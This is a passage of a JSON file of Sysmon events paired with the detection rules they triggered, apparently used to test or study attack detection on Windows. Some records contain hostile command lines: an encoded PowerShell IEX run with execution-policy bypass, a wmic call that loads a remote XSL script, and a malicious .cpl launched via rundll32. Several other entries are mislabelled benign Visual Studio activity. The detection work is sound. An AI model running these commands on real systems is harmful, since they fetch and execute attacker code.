scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ParentProcessId":1420,"ProcessGuid":"365ABB72-6759-5CD8-0000-001085031000","ProcessId":1912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
18:35:05.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16793,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.780949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F41E-5D53-0000-001067C80300","ParentProcessId":4824,"ProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 
12:17:14.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10674,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.614739Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ParentProcessId":2476,"ProcessGuid":"747F3D96-FBCA-5D53-0000-001036784100","ProcessId":2876,"Product":"Microsoft ® Windows Script 
Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10675,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.893930Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 21:09:48.910","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-6056-5D3F-0000-0010C9EF4100","ProcessId":4600,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl","UtcTime":"2019-07-29 21:11:11.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4860,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:11.156704Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\System32\\control.exe\" \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\control.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A7B65500","ParentProcessId":4996,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ProcessId":4356,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.445"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.587732Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ParentProcessId":4356,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ProcessId":4884,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4864,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.621241Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\wscript.exe\" /e:JScript.Encode /nologo C:\\Users\\IEUser\\AppData\\Local\\Temp\\info.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\","Description":"Microsoft ® Windows Based Script 
Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE","Image":"C:\\Windows\\SysWOW64\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ParentProcessId":4884,"ProcessGuid":"747F3D96-60F7-5D3F-0000-00106F2F5600","ProcessId":6160,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:19.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4865,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:19.098105Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process list /format:\"https://a.uguu.se/x50IGVBRfr55_test.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-CE84-5CE6-0000-001094130600","ParentProcessId":2940,"ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 16:49:05.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":892,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:05.736570Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-23 16:49:07.731","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\x50IGVBRfr55_test[1].xsl","UtcTime":"2019-05-23 
16:49:07.731"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":894,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:07.731893Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper","Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\updatevbs.vbs\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.8.7600.16385","Hashes":"SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\updatevbs.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9C8E-5D04-0000-0010D0421600","ParentProcessId":540,"ProcessGuid":"365ABB72-9C9D-5D04-0000-001039CE1600","ProcessId":172,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 
07:22:05.660"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7681,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:22:05.691759Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.236","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\~DF0187A90594A6AC9B.TMP","UtcTime":"2021-01-26 13:21:13.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429127,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.237481Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.558","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\b8162606fcd2bea192a83c85aaff3292f908cfde","UtcTime":"2021-01-26 13:21:13.558"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429128,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.558988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 
13:21:13.560"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429129,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.560814Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.561"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429130,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.561514Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler 
on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.290","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.log","UtcTime":"2021-01-26 13:21:13.683"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429131,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.683762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\bouss\\source\\repos\\blabla\\","Description":"MSBuild.exe","FileVersion":"16.6.0.22303","Hashes":"SHA1=20456AC066815ED10C6CEF51AF5431ED6001532F,MD5=35DC099BE64FA5AB4C01DDA908745240,SHA256=5083FD9C0AB7ECAEE85B04A22EBD29A88D7BC75CB02186D9C9736269B8AC10A9,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-5082-600D-0000-0020A246F726","LogonId":"0x26f746a2","OriginalFileName":"MSBuild.exe","ParentCommandLine":"\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe\" 
\"C:\\Users\\bouss\\source\\repos\\blabla\\blabla.sln\"","ParentImage":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ParentProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ParentProcessId":7664,"ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"Product":"Microsoft® Build Tools®","RuleName":"","TerminalSessionId":5,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2021-01-26 13:21:13.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2429132,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.690036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.641","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\blabla.lastbuildstate","UtcTime":"2021-01-26 
13:21:13.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429134,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.972503Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429135,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975523Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - 
